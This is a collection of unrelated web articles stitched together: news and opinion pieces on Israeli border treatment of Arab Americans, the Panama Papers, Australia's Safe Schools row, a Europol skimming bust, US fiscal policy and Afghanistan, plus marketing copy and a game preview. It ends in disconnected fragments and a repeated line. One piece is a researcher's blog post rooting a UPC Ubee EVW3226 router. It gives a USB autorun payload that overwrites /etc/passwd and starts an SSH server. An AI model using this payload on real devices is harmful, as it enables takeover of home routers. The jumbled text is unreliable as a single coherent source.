The petition was created on October 1st and has over 2,000 signatures as of this writing . Over 100,000 signatures will be needed by October 31st before the President and administration policymakers are required to post an official public response .
You can read the publicly posted petition and digitally sign it here .
Related :
How could our hospitals be so careless ?
Dallas Paramedics Were n't Told They Were Driving Ebola Contaminated Ambulance for 48 Hours
Updated Tracking : Here 's Where People Are Being Tested for Ebola
As It Happens : Ebola in America Newsfeed : What You Need to Know
Resources :
Pandemic Preparedness Guide and Supply List
Prepping for an Ebola Lockdown
Here 's Why You Should NOT Panic Over Ebola
Last year , some members of Congress attempted to pass legislation that would admit Israel into the U.S. Visa Waiver Program . The State Department pushed back , noting that because of Israel 's long history of discrimination against Americans of Arab descent , they do not meet the program 's key requirement of reciprocity .
Congress relented and instead passed a Sense of Congress that stipulated that should Israel meet this requirement , they could be included in the Visa Waiver Program . In a sense , they were put on probation .
ADVERTISEMENT
In the past year Israel has continued to demonstrate that it has no intention of ending their practice of discriminating against persons of Arab descent . My office has received new reports of shameful treatment meted out to Arab Americans on their arrival in Israel . Two cases , in particular , deserve to be noted .
After landing at Ben Gurion International airport , George Khoury , 70 , and Habib Joudeh , 62 , were detained for long hours , subjected to abusive interrogations , insulted by Israeli security personnel , and finally denied entry and forced to purchase , at their own expense , return tickets to the United States .
George is a professor and a deacon of his church from San Francisco . Habib is a pharmacist and respected community leader from Brooklyn . Both are American citizens of Palestinian descent . George was traveling to the Holy Land on a pilgrimage . Habib was on his way to attend a family wedding in the West Bank . Neither had been back to Israel/Palestine in more than 20 years . And neither was able to complete their journey .
While no American should be subjected to such treatment , the most disturbing element of these cases is the reason they were denied entry and deported . Because both men were of Palestinian descent , Israel would not honor their U.S. passports or recognize the men as American citizens . Both were told they had to acquire Palestinian IDs and then , as Palestinians , enter the West Bank through Jordan .
George 's case is especially instructive . When the Israeli border control agent told him that he could not enter Israel , George attempted to engage the agent saying , `` I 'm coming as an American citizen . '' To which the agent replied `` No , no , you belong with the Palestinian people . This is our Israel , this is for the Jews . No Palestinian should come to Israel . You should have gone through the Allenby Bridge . ''
When George explained that `` I am coming with an American passport and you should honor it , '' the agent replied , `` How do you want me to honor your American passport ? Do you want me to kiss it , to hug it , or to worship it ? ''
What happened to Habib and George were not the actions of a few rogue agents . For more than three decades , the Arab American Institute has submitted to the State Department hundreds of instances where Arab Americans have been subjected to such treatment at Israel 's borders .
By so flagrantly disregarding the citizenship rights of Americans of Arab descent , Israel is in violation of its treaty obligations found in the `` 1951 US-Israel Treaty of Friendship , Commerce , and Navigation . '' In the language of the treaty , Israel pledges to permit U.S. citizens the right to `` travel freely , to reside at places of their choice , to enjoy liberty of conscience '' and to guarantee them `` the most constant protection and security . ''
Not only has Israel consistently violated its treaty obligation , but our government has failed to live up to its commitment to protect the rights of its own citizens . The opening page of the U.S. passport states that `` The Secretary of State of the United States of America hereby requests all whom it may concern to permit the citizen/national of the United States named herein to pass without delay or hindrance and in case of need to give all lawful aid and protection . ''
The Department of State says that it does not condone Israel 's treatment of Arab Americans . In reality , despite denying Israel 's admission into the Visa Waiver Program , the State Department appears to acquiesce to Israel 's behavior .
When George Khoury 's daughter wrote a letter of complaint to the U.S. Embassy in Tel Aviv , she received a response saying `` Unfortunately , the US government can not assist US citizens in gaining entry into Israel ... Should your father wish to travel again in the future , we advise him to contact the nearest Israeli Embassy or Consulate for guidance . ''
The U.S. official then directed her to the Department of State `` Travel Advisory '' which states that `` regardless of whether they hold US citizenship , Israeli authorities consider anyone who has parents or grandparents who were born or lived in the West Bank or Gaza to have a claim to a PA ID . '' They will , therefore , be treated as Palestinians and not as Americans .
It is upsetting that both the Department of State `` Travel Advisory '' and the Consul 's letter acknowledge Israel 's disregard for our citizenship rights and claim to be powerless to hold them accountable for their actions . This acquiescence allows Israel to act with impunity . It also makes our government appear to be complicit in Israel 's behavior .
More must be done . Israel can not be allowed to disregard the citizenship rights of Americans or to unilaterally define persons of Arab descent as second-class American citizens . The Department of State and our elected representatives should demand that the Israeli government fully live up to its treaty obligations to treat all Americans equally without regard to their religion or national origin .
This is not merely a matter of denying Israel Visa Waiver privileges , it is a question of whether or not our government will guarantee Arab Americans the equal protection to which they are entitled and which they deserve .
Zogby is president of the Arab American Institute .
It 's a data-driven world out there and B2B enterprises need to drift with the times . In the face of unpredictable market forces , it is important now for these companies to harness new technologies that can provide wide-ranging benefits to their lead generation and appointment setting campaigns .
As a way to effectively reach out to multiple audience touch points , database integration is becoming an important strategic answer to business needs in vibrant economies like Singapore .
Despite negative outlooks this year , the country continues to receive international capital . In recent developments , Britain-based business intelligence firm B2B International has expanded its reach in the Lion City . The firm believes that South Asia continues to be an important opportunity base for similar companies to harness .
For now , B2B suppliers such like you need to use cost-efficient and time-saving ways in order to stay in profit and provide the necessary services to current and potential clients .
Integrating your marketing and sales functions in this case should be the first thing in mind since it entails benefits to B2B lead generation like :
1 . Savings
Economic uncertainties entail the need to become more conservative in terms of spending . In this sense , businesses need to make better and highly profitable strategies . Linking your CRM with your sales drives accuracy and proper revenue attribution . This provides you insights into how much you are spending and how much you are gaining back . Accordingly , this enables you to create more revenue-friendly strategies .
2 . Lead generation proficiency
Quality is usually a pressing issue among B2B service providers due to the particular problem of setting up an effective lead prospecting and lead scoring database . Manpower proficiency has been the common culprit , but the problem usually demands investment in an efficient system that accurately gauges audience interests and undertakes interaction-based scoring .
3 . Effective and timely deliveries
You can not afford to send the wrong messages to the right person . It entails a waste of time and money . On the other hand , you can use marketing automation software to segment your audience and send them content in line with their needs , thus keeping in line with the need to prioritize audience interests .
4 . Accurate reporting
Integrated CRM and sales are essential in providing you with up to date information about the implementation and progress of your campaigns . Letting you focus on the right metrics and KPIs , integrated software systems is advantageous in identifying the best actions to take for better profitability and survival of your business .
Middle East and North African leaders and their families have used secret offshore accounts to stash billions of dollars of cash and manage investments and assets , according to information from the so-called `` Panama Papers '' leak .
The details of the financial lives of many leaders were contained in the leak of 11.5 million tax documents from the Panamanian offshore law firm Mossack Fonseca .
The documents , which have been seen by more than 100 media groups , were reported on Sunday and have been described as the biggest data leak in history . It reveals the hidden offshore dealings of 140 political figures , including 12 current or former heads of state .
Among them are leaders or close associates and family members from the Arab world , including Qatar , the UAE , Saudi Arabia , Iraq , Jordan , Syria , Egypt and Morocco .
The vast stash of records for the first time details some of the financial dealings carried out by the wealthy leaders and their relatives , revealing how vast property portfolios and bank accounts are managed through a network of companies mostly registered in the tax haven of the British Virgin Islands .
The Mossack Fonseca documents detail more than 40 years of their work for clients that include at least 33 people and companies blacklisted by the US for wrongdoing , such as some Iranian interests and those of Lebanon 's Hezbollah .
The documents were provided by an anonymous source to German newspaper Sueddeutsche Zeitung , who shared them with media worldwide through the International Consortium of Investigative Journalists ( ICIJ ) .
The BBC cited Mossack Fonseca as saying it had operated `` beyond reproach '' for 40 years and had never been charged with criminal wrongdoing .
Panama 's government vowed on Sunday to `` vigorously cooperate '' with any legal probe that might follow in the wake of the data leak .
Here is a breakdown from the ICIJ of the documents that relate to leaders and their relatives from the Middle East and North Africa .
The leaders
Qatar
Emir of Qatar Sheikh Hamad bin Khalifa al-Thani ( L ) and Qatari Prime Minister and Foreign Minister Sheik Hamad bin Jassim al-Thani ( R ) attend the opening of the Doha Forum ( AFP )
Former prime minister Sheikh Hamad bin Jassim bin Jaber al-Thani bought a company in 2002 that was registered in the British Virgin Islands and three others in the Bahamas .
Through these companies Thani , who is popularly known as HBJ and is worth an estimated $ 7bn , managed his $ 300mn super-yacht al-Mirqab .
In 2011 , HBJ bought four companies in Panama who held bank accounts in Luxembourg , where Qatar had recently started investing due to its low taxation , according to documents dated July 2013 .
The ICIJ did not reveal how much money was held in these accounts but they did reveal that two of his accounts were co-owned with the then Emir of Qatar Sheikh Hamad bin Khalifa al-Thani , who also features in the Mossack Fonseca leak through the ownership of a company in the British Virgin Islands .
The ICIJ published a copy of HBJ 's passport which was included in the leak , which showed his diplomatic status , something which the former prime minister has used recently to avoid prosecution in Britain over allegations he had a British citizen falsely imprisoned and tortured .
A spokesperson for HBJ told the ICIJ that they did n't “ have the right ” to answer any questions about the leaked documents because he is “ bound by professional secrecy ” .
United Arab Emirates
Emirati President Sheikh Khalifa bin Zayed al-Nahayan ( L ) looks at a photo exhibition including an image of himself with Britain 's Queen Elizabeth II ( AFP )
President Khalifa bin Zayed bin Sultan al-Nahyan was the owner of at least 30 companies established in the British Virgin Islands by Mossack Fonseca .
Through these companies the Emirati leader controlled a vast portfolio of luxury properties worth at least $ 1.7bn that he owns in the upmarket London districts of Kensington and Mayfair .
The purchase of the properties , according to the documents , was financed by loans from the London branch of the National Bank of Abu Dhabi and the Royal Bank of Scotland .
Mossack Fonseca handled the president 's dealings sensitively , and in 2011 the law firm wrote in one leaked document that he was `` usually hesitant '' about providing information about his identity .
A British law firm that represents Nahyan told the ICIJ that it was `` unable to help '' with comments on the leak .
Saudi Arabia
Saudi King Salman bin Abdulaziz arrives to attend the inauguration ceremony of the Yanbu Aramco Sinopec Refining Company ( YASREF ) project ( AFP )
King Salman took out loans in 2009 of $ 34mn for mortgages on his luxury central London homes .
The king 's role is not specified in the documents , according to the ICIJ , but the mortgages are said to be `` in relation to '' him and his assets .
The documents also name the king as the principal user of a motor yacht called Erga , after his palace in Riyadh .
The Saudi embassy in the US did not respond to the ICIJ when asked to comment on the leak .
Saudi Arabia is currently struggling with a huge budget emergency , which has forced it to consider selling stakes in its oil business to create a $ 2 trillion wealth fund .
Mohammed bin Salman , the deputy crown prince , on Sunday told Bloomberg that the Saudi government was to introduce a sales tax within four years to raise $ 10bn a year , `` restructure '' subsidies to generate $ 30bn a year , and drum up $ 10bn a year by charging companies who recruit more foreign workers than their official quotas .
Iraq
Iraqi interim Prime Minister Iyad Allawi meets with local politicians and tribal leaders at ousted leader Saddam Hussein 's hometown of Tikrit ( AFP )
The former prime minister , Ayad Allawi , used a company registered in Panama at least in part to manage valuable property he owns in London .
Allawi , who opposed the late former leader Saddam Hussein in exile before becoming prime minister in 2004 following the US-led invasion , was the sole shareholder of IMF Holdings , according to the leaked Mossack Fonseca documents .
As of April 2013 , the documents showed that the company was registered through the company with an estimated value of $ 1.5mn .
Allawi had another company registered in Panama , Moonlight Estates Limited , and this also had London property registered under its ownership , however ; the ICIJ did not report its value or status .
A media office representing Allawi told the ICIJ that the IMF company was established to own residential property owned by the former prime minister of Iraq .
They said that `` any income generated in the United Kingdom from the properties owned by the companies has been properly accounted for '' and `` taxes have been paid promptly and on time '' .
Jordan
Ali Abu Ragheb attends a parliament meeting in Amman 14 August 2003 ( AFP )
Former prime minister Ali Abu al-Ragheb owned several companies registered in the British Virgin Islands and Seychelles , which he co-directed with his wife Yusra .
The British Virgin Islands company was named by the ICIJ as Jaar Investment Ltd , which held a bank account for Ragheb and his wife in Switzerland 's Geneva .
This company was inactivated in August 2008 .
Ragheb served as Jordan 's prime minister from 2000 until 2003 , when he resigned and joined the boards of leading Jordanian finance and insurance companies .
The Mossack Fonseca documents also showed that until December 2014 Ragheb owned three Seychelles companies , as well as revealing that his sons were listed as directors in numerous other British Virgin Islands ' companies , including Desertstar Investment Capital Limited , which held a bank account at the Arab Bank in Geneva and was used to invest in Jordan .
The family of the leaders
Syria
Rami Makhlouf cofounded Syriatel , and subsequently took 73 percent of shares in the telecom company , most of which were registered with a British Virgin Islands company ( AFP )
Two cousins of Syrian President Bashar al-Assad , Rami and Hafez Makhlouf , used Mossack Fonseca to manage their vast and lucrative investments arising out of their relation to Syria 's head of state .
The ICIJ reported that in 2002 Rami Makhlouf cofounded Syriatel , a Syrian mobile telecom company , that he subsequently took 73 percent of shares , most of which was registered with a British Virgin Islands company he owned .
The documents showed the Makhlouf brothers had a slew of bank accounts in Geneva .
The documents showed that in February 2011 , around the same time protests broke out against Assad , staff at Mossack Fonseca discussed via email allegations of bribery and corruption made against the Makhlouf family and sanctions imposed by the United States Treasury Department , according to the ICIJ .
In June 2011 the British Virgin Islands Financial Services Commission wrote to Mossack Fonseca regarding a money laundering investigation against the family , which prompted the law firm to subsequently cut ties with the Makhlouf family .
Neither of the two Makhlouf brothers responded to calls for comment made by the ICIJ .
Egypt
An image grab taken from Egyptian state TV shows Alaa Mubarak , son of ousted Egyptian president Hosni Mubarak , sitting behind bars ( AFP )
Alaa Mubarak , the eldest son of former president Hosni Mubarak , owned the British Virgin Islands registered company Pan World Investments Inc , which was managed by Credit Suisse .
When his father was pushed out of power in 2011 , Alaa was arrested by Egyptian authorities and British Virgin Islands authorities told Mossack Fonseca to freeze Pan World 's assets on the basis of European Union legislation .
The Panamanian law firm was fined $ 37,500 in 2013 for failing to properly carry out checks on Alaa Mubarak who was defined as a `` high-risk customer '' .
Documents reported by the ICIJ showed that Mossack Fonseca admitted their procedures were “ seriously flawed ” and later investigations against Mubarak prompted staff at the law firm to admit they could be found “ in further breaches ” .
Mossack Fonseca staff said they had “ very little control ” over Mubarak 's Pan World company and in April 2015 they resigned as its agent .
Alaa Mubarak did not respond to the ICIJ when asked to comment on the leak .
Morocco
Private Secretary to Morocco 's king Mounir Majidi ( AFP )
Mounir Majidi , the private secretary of Morocco 's King Mohammed VI , oversaw the multi-million dollar transactions of a company registered in the British Virgin Islands that bought a luxury car used by the king and executed an expensive renovation of a Paris apartment .
Majidi , who became the king 's private secretary in 2000 , was appointed the head of SIGER in 2002 , which is the holding company of Morocco 's royal family that controls their interests in mining , agriculture , and telecommunications .
Majidi , with power of attorney control over the SMCD company , purchased in January 2006 a luxury 1930s yacht , the Black Douglas , which was later named El Boughaz I and is now owned and used by the king .
In 2003 , a Luxembourg-registered company which Majidi administered borrowed $ 42mn from a Mossack Fonseca incorporated company to buy and renovate a luxury Paris apartment , according to the ICIJ .
A lawyer representing Majidi told the ICIJ that the business dealings were done “ in strict accordance with laws ” .
Queensland MP levels accusation at university professor Gary Dowsett as Coalition MPs step up attack on anti-bullying initiatives for LGBTI students
One of parliament 's biggest opponents of the Safe Schools program , Queensland MP George Christensen , has accused a professor linked to the anti-bullying program of being an advocate of paedophilia .
Safe Schools LGBTI program : Malcolm Turnbull faces backbench revolt Read more
Christensen used parliamentary privilege to level the accusation at Gary Dowsett , deputy director of the Australian Research Centre in Sex , Health and Society at La Trobe University .
Another La Trobe academic runs the Safe Schools Coalition and the group is based at the university .
He alleged Dowsett was a “ long-time advocate of intergenerational sex , otherwise known as paedophilia ” and quoted from a 1982 article in the quarterly newsletter , “ Gay information ” , that equated the touch of a parent to that between a paedophile and child .
The information was first brought to light by the conservative group , the Australian Family Association .
“ I think it would shock many parents to learn that a paedophilia advocate was overseeing the organisation that came up with the Safe Schools programs , ” Christensen told the House of Representatives . “ It 's imperative all federal funding be suspended to Safe Schools pending a full parliamentary inquiry . ”
Dowsett has been contacted for comment about the article , which was written in 1982 and which has been seen by Guardian Australia .
Earlier on Wednesday , Dowsett told Australian Associated Press he is yet to hear Christensen 's full accusation .
“ I really do n't want to comment about him , ” Dowsett said . “ I will leave that to other people at this point to comment . There might be other people who might want to comment . ”
George Christensen seeks contributors to new 'war on radical Islam ' website Read more
La Trobe University put out a statement backing Dowsett late on Wednesday evening .
“ We are appalled that a respected academic has been attacked using parliamentary privilege . This is a blatant attempt to distract attention from the independent endorsement of the highly effective Safe Schools program , ” a university spokesman said . “ We stand by the important work of Professor Dowsett and his team . ”
The prime minister , Malcolm Turnbull , called a review into the Safe Schools program late last month , amid concerns from conservatives in his own party .
Backbenchers were briefed on the review – which has not yet been made public – on Tuesday night .
Many conservative MPs were unhappy with the short duration of the review and its limited scope .
“ They [ the terms of reference ] were deliberately quite narrow to deal with some materials that were made available in the classroom but they did n't deal with materials that were available outside of the classroom and were part of the Safe Schools program . They 're the materials that are really concerning , I think , many of my colleagues and many parents around the country , ” Cory Bernardi told ABC TV .
Christensen said more than half of the Coalition backbench in the lower house had concerns with the program . He had written to Turnbull , replete with “ a few pages of signatures ” from fellow MPs , calling for federal funding to be shelved until a full parliamentary inquiry into the program is conducted .
The Victorian premier , Daniel Andrews , vowed to continue funding the program at a state level if federal funding is pulled .
“ If it saves just one life , it 's worth it , ” Andrews wrote on his Facebook page . “ Safe Schools is officially saved in Victoria and it will have a place in our schools long after Cory Bernardi and the rest of his dinosaurs eventually disappear from the Senate . ”
Four key members of an international criminal network responsible for compromising payment card data and illegal transactions against European citizens were arrested today , 30 November 2017 , during a joint law enforcement operation called “ Neptune ” .
The operation run by the Italian Carabinieri , in cooperation with the Bulgarian General Directorate of Combating Organised Crime , and the National Police of the Czech Republic , supported by Europol 's European Cybercrime Centre ( EC3 ) culminated today with the arrest of four Bulgarian citizens . The leaders of the transnational criminal group actively supervised all stages of criminal activities , including placing technical equipment on ATMs in the central areas of European cities , producing counterfeit credit cards and subsequently cashing out money from ATMs in non-European countries , for example Belize , Indonesia and Jamaica .
During the coordinated action today , dozens of ATMs were identified as being tampered by placing skimming devices such as micro cameras and magnetic strip readers . Over 1000 counterfeit credit cards were seized and evidence of many fraudulent international transactions worth more than EUR 50 000 were collected .
The investigation started at the end of 2015 , and from the very beginning the European Cybercrime Centre ( EC3 ) assisted the investigation by providing forensic and analytical support , organising on-the-spot forensic activities as well as analysing seized laptops and smartphones . The coordination and exchange of intelligence has been supported by the Joint Cybercrime Action Taskforce ( J-CAT ) set up at Europol . Since most of the illegal transactions with counterfeit cards took place overseas , the cooperation through dedicated investigative networks set up by Europol has been instrumental .
A key factor for the successful dismantling of this criminal organization was the close police cooperation between police forces from Italy , Bulgaria and the Czech Republic , supported by Europol . Working closely with the banking sector , law enforcement made another significant step towards making electronic transactions safer in the European Union .
The fiscal cliff deal
3 January 2013
The bill passed by Congress averting tax increases and spending cuts dubbed the `` fiscal cliff '' sets the stage for a campaign by both parties and the US media for sweeping attacks on social programs that provide health coverage and retirement income for the elderly , the disabled and the poor .
A small increase in the income tax rate on the top 0.7 percent of households in the bill passed Tuesday will serve as window dressing for an assault on the basic social reforms of the 1930s and 1960s . The bipartisan deal worked out between the Obama White House and Democratic and Republican congressional leaders delays for two months $ 110 billion in military and domestic spending cuts . This sets up a new crisis deadline in March that coincides with the legal need to raise the federal debt limit and the expiration of a “ continuing resolution ” funding the operations of the federal government .
With the tax side of the issue having been resolved in the fiscal cliff bill , the corporate-controlled media will demand that the “ debt limit cliff ” be averted by massive cuts in social spending , targeting Medicare , Medicaid and Social Security .
The use of artificial deadlines and phony crises to manipulate the public has become a basic modus operandi for managing the political affairs of the American ruling elite . The so-called fiscal cliff debate was from the start a cynical and stage-managed exercise , reflecting the inability of the political system to address the concerns of the masses and its complete servility to the financial aristocracy .
Part of the process is the creation by the media of a synthetic “ public opinion ” that has nothing to do with the real concerns and views of the population . Already on Wednesday , the morning news programs were speaking of a groundswell of popular anger over the failure of Congress to enact “ real ” deficit-reduction measures and serious cuts in social programs—this in the face of repeated polls that show a large majority of the population opposed to such cuts .
Obama exemplified the hypocrisy of the Democratic Party in his remarks Tuesday night following passage of the bill by the House of Representatives . “ A central promise of my campaign for president , ” he declared , “ was to change the tax code that was too skewed towards the wealthy at the expense of working middle-class Americans . Tonight we 've done that . ”
This is a lie . The bill actually makes permanent the income tax cuts for the rich instituted under Bush , with the exception of a modest increase in the rate for households making more than $ 450,000 a year . It permanently sets the tax rate for capital gains and dividends at 20 percent , and keeps the threshold for estate taxes at $ 5 million for individuals and $ 10 million for couples , with an inflation adjustment that will raise the minimum to $ 15 million by the end of the decade .
These rates are very low by historical standards , in most cases lower than those that existed prior to 2001 . They constitute a massive windfall for the wealthy .
At the same time , the fiscal cliff bill raises taxes on 77 percent of households by allowing a 2 percent cut in the Social Security payroll tax to expire . A typical family earning $ 50,000 will pay an additional $ 1,000 in federal taxes in 2013 .
Obama reiterated his commitment to attacking entitlement programs such as Medicare and Social Security . Calling Medicare “ the biggest contributor to our deficit , ” he pledged to “ reform that program. ” He went on to speak of “ further unnecessary spending in government that we can eliminate . ”
The Congressional Budget Office issued a report estimating that the fiscal cliff agreement would add $ 4 trillion to the federal deficit over the next decade , as compared to what would have happened had the spending cuts and tax increases set for the New Year been allowed to take effect . Who is to pay for this “ extravagance ? ”
A column by New York Times commentator David Brooks published Monday , entitled “ Another Fiscal Flop , ” makes clear the thinking within the ruling class . Brooks begins by declaring that the American `` welfare state '' has become “ unaffordable . ”
He places the blame on retirees , who have the effrontery to expect decent medical care and then use it to live longer . “ Obligations to the elderly are already squeezing programs for the young and the needy , ” he writes , demanding “ deep structural reforms ” of Medicare , including turning it into a poverty program by introducing means-testing .
“ Ultimately , ” he writes , “ we should blame the American voters , '' who have “ decided they like spending a lot on themselves and pushing costs onto their children and grandchildren. ” A prime example of this greed is the “ average Medicare couple , ” who consume “ $ 234,000 in free money '' above what they pay into the system .
This calumny against the American people provides a hint of the savagery that animates the US corporate-financial elite , which will stop at nothing to reverse the social reforms of the last century and reduce the working class to poverty .
Barry Grey
Final Fantasy Explorers Details The Paladin , Ranger , And The Shiva Boss Fight
By Sato . August 22 , 2014 . 9:33am
Square Enix shared details on a few Final Fantasy Explorers jobs with Knight , Monk , and Black Mage . Below is a look at more details on the Paladin and Ranger jobs , along with a closer look at the Ice Queen Shiva , and more .
Paladins have high defense and play the role of a tank . They excel at physical and magic attacks , but due to their lack of mobility , they stick around on the frontlines as a shield for the party .
Their ability called “ Absolute Domain ” can be used to protect themselves and allies around them from enemy attacks . In addition to tanking , they can also provide the party with some support as well .
The Paladin 's “ Deflect ” ability lets them use their shield to defend attacks from enemies . This is their go-to move as a tank . “ Spinning Edge ” is one of their offensive moves that can hit enemies around them .
Rangers are long-ranged damage-dealers . They might not be as strong as the melee damage-dealers , but they can use various status inflicting attacks . Their defense is on the lower side , so they 're not too great when it comes to close-ranged combat .
Their best feature is the ability to attack from a distance , but they also have all kinds of tricks up their sleeves with their physical and status effect attacks .
The “ Abyss Shot ” can do different effects like poison or paralysis . The “ Arrow Rain ” ability is recommended to use when the tank gets hate from the monsters .
Moving along , Shiva the “ Ice Queen ” hangs out in the the dim cave known as the Tinz Underpass , where you 'll fight her . There are crystal-like parts throughout the cave , along with plenty of water-based monsters .
The Tinz Lake is where Shiva can be found . The place is dark and cold , and seems to be covered entirely in ice . There 's also a throne-like object that is made of ice , so it 's safe to assume that it 's where Shiva sits .
Shiva has appeared throughout the series since Final Fantasy III , and this time , she 'll be putting her icy powers to take on the Explorers . In Final Fantasy Explorers , she 's covered by an extremely cold aura that puts a freezing effect on anyone who gets near .
Once you 're in a freeze status , your movement will be limited , so it 'll be worth making sure you do n't get too close to the aura while taking her on . She also has moves like “ Blizzard ” and “ Frozen World ” that brings out spikes made of ice from the ground .
And let 's not forget about her trademark move , “ Diamond Dust , ” which is shown in the above image .
Final Fantasy Explorers will be released in Japan on December 18th , 2014 . The game has yet to be announced for release in the West .
The founder of the private military company Blackwater Worldwide is ripping President Trump 's new Afghanistan war plan as an “ Obama-lite policy . ”
Erik Prince — who has encouraged administration officials to use contractors instead of U.S. military forces in Afghanistan — called Trump 's plan “ a continuation of the same limited or failed strategy of the last 16 years . ”
“ This is a kind of Obama-lite policy , ” Prince told The Hill , referring to President Obama 's 30,000 troop surge in 2009 in Afghanistan . The increase brought the total number of troops in the country to more than 100,000 in 2011 before a rapid drawdown .
“ This is a lighter but almost as expensive version . Remember , the Pentagon now is spending as much as when they had five times as many troops in the country . It 's horrendous how they 've lost control of the spending . That 's what makes this so unsustainable , ” Prince added .
The president is expected to send about 3,900 additional U.S. troops to the country , on top of the 8,400 already there . In his prime-time address , Trump declined to say how many troops he would send or reveal a firm timeline for how long they would serve there .
Prince is doubtful that the president and Defense Secretary James Mattis James Norman MattisTrump backs off total Syria withdrawal Grass-roots campaign backs Mattis for public office Overnight Defense : Dems tee up Tuesday vote against Trump 's emergency declaration | GOP expects few defections | Trump doubles number of troops staying in Syria to 400 MORE are fully behind the strategy .
“ I do n't think the president loves this plan , I do n't think Secretary Mattis does either . He 's not even on the same continent , ” Prince said , referring to Mattis 's current trip to the Middle East and Europe .
ADVERTISEMENT
Prince had been privately and publicly shopping a plan to replace most U.S. troops with contractors prior to Trump 's speech Monday night .
The plan would have sent 5,500 private military contractors to embed with Afghan forces at the battalion level . They would be supported by a 90-plane private air force . The New York Times first learned of the plan in July .
He did n't personally brief the president on such a strategy , but Prince did present the proposal to former chief strategist Stephen Bannon , national security adviser H.R . McMaster and former chief of staff Reince Priebus .
McMaster reportedly opposed the plan , as did Mattis , but Bannon was rumored to be in favor .
`` Our commitment is not unlimited , and our support is not a blank check , '' Trump promised of the latest strategy .
Prince is skeptical .
“ He said it 's not a blank check , but the Pentagon continues to stand and plan and operationalize as if it is a blank check , ” Prince said . “ That 's the fundamental problem the plan now does n't address : How does this end . The Pentagon wants to position this like a forever occupation like South Korea . And I think that 's a horrendous and untenable position . ”
Prince also accused McMaster and senior Pentagon leadership of blocking Trump from hearing him out .
“ The plan I laid off for the president ... the Pentagon has chosen to ignore , for as much as the Pentagon tries to focus on diversity , they 're not at all interested in diversity of opinion of how to end the longest war , ” he said .
Inspired by Blasty and his UPC Wifi key generator I decided to take a look at my UPC router too . It 's a Ubee EVW3226 with a custom firmware built by UPC providing a modified web interface and a lot of other stuff .
First I tried to identify some debug pins on the board and found multiple possible UART connectors . I connected my Buspirate to the first UART and got a login shell protected by a password . I tried some default passwords but was not able to get in so I needed to find another way . According to another blog post I found there is also a second UART connector with no password but this one was not working on my device .
So I took a deeper look at the chips on the board and identified two flash chips : Spansion FL128PIF . By looking at the datasheet I discovered there are some SPI pins on the chip to dump its content ( or write to it ) . So I attached a SOIC test clip on top of the flash chip and connected my GoodFET to it . Using the test clip is a good alternative because there is no need to desolder any chips . I was able to dump the whole 16MB memory of each chip using this method with spiflash dump . The address ranges to dump can be taken from the datasheet too .
The next thing to do was to extract the content of the dumped images . By using the latest development version of binwalk I was able to extract the file system contents of both chips . This dump only contains the firmware with no dynamic content from UPC so far so the running config is still missing .
After peeking around some binaries with IDA I found the following code in aimDaemon :
The snippets show the relevant code sections : The binary extracts the label of an external attached USB device and if it matches EVW3226 it executes /var/tmp/mount-usb.sh with go as a first parameter .
mount_usb.sh :
# ! /bin/bash if [ $ 1 == `` go '' ] ; then dev_path= $ ( blkid /dev/sd |cut -c 1-9 ) eval $ ( blkid /dev/sd |cut -d `` `` -f 2 ) eval $ ( blkid /dev/sd |cut -d `` `` -f 3 ) eval $ ( blkid /dev/sd |cut -d `` `` -f 4 ) echo `` dev_path=\ '' $ dev_path\ '' LABEL=\ '' $ LABEL\ '' UUID=\ '' $ UUID\ '' TYPE=\ '' $ TYPE\ '' '' > > /tmp/mountlist umount_folder= $ ( mount | grep `` /var/tmp '' | awk ' { print $ 3 } ' ) for curr_folder in $ umount_folder ; do if [ -n `` $ curr_folder '' ] ; then umount -l $ curr_folder rm -fr $ curr_folder fi done for curr_folder in $ UUID ; do mkdir /var/tmp/media/ $ curr_folder -p if [ `` $ TYPE '' == `` ntfs '' ] ; then echo `` ntfs-3g `` $ dev_path '' /var/tmp/media/ '' $ curr_folder ntfs-3g $ dev_path /var/tmp/media/ $ curr_folder else echo `` mount `` $ dev_path '' /var/tmp/media/ '' $ curr_folder mount $ dev_path /var/tmp/media/ $ curr_folder fi if test -f /var/tmp/media/ $ curr_folder/.auto then rm -fr /var/tmp/disk cd /var/tmp ln -s /var/tmp/media/ $ curr_folder disk chmod +x /var/tmp/media/ $ curr_folder/.auto sh /var/tmp/media/ $ curr_folder/.auto fi done if [ $ 2 == `` 1 '' ] ; then killall minidlna /fss/fss2/sbin/minidlna -R -f /var/tmp/minidlna.conf fi else echo $ 1 ... > > /var/tmp/.usbadd fi
As you may see this script mounts the usb stick and checks if the stick has a .auto file present . If the file exists a symbolic link to /var/tmp/disk is created and the .auto file is executed with sh .
So by creating an USB stick with the correct label and this autorun file we are able to execute any commands we like on the router .
The device is capable of running in router or in bridge mode . It looks like there is some check in place to only execute the script when running in router mode so be sure to switch to this mode if you want to try it on your own .
So lets first prepare our USB stick :
umount /dev/sdb1 fdisk /dev/sdb # clear partition table and create a new primary partition mkfs.vfat /dev/sdb1 mlabel -i /dev/sdb1 : :EVW3226
Let 's try to start a telnet server on the device by putting the following in the .auto file :
telnetd &
After plugging the stick in and waiting a few seconds I was able to connect via telnet . Unfortunately it seems some process is killing telnetd on a regular basis so it 's no stable way to get access to the device .
Luckily there is also dropbear present so we can start a ssh server . The filesystem is missing the required hostkeys so I recreated them on a Ubuntu VM on the USB stick by
dropbearkey -t rsa -f /media/firefart/EVW3226/dropbear_rsa_host_key
As I was not able to crack the password hashes in a reasonable time we also need to add our own user . I did this by just overwriting /etc/passwd with an admin : admin hash .
So the final .auto file looks like
# ! /bin/bash echo admin : FvTuBQSax2MqI:0:0 : admin , , , :/ : /bin/sh > /etc/passwd dropbear -r /var/tmp/disk/dropbear_rsa_host_key -p 192.168.0.1:22
After plugging in the USB-Stick and waiting a few seconds we can connect to the device using ssh and login using the password admin .
ssh admin @ 192.168.0.1
The next steps are to peek around the device . There are already a lot of passwords and private keys lying around in the firmware image .
There was also a great talk on 32C3 - Beyond Your Cable Modem which gives some good ideas what to check next .
“ Will the flight affect your reproductive organs ? ”
“ Do you weep when things go wrong on the job ? ”
“ Will you become a mother ? ”
It may be too bad that our society is n't further along and this is such a big deal .
It may be too bad that our society is n't further along and this is such a big deal .
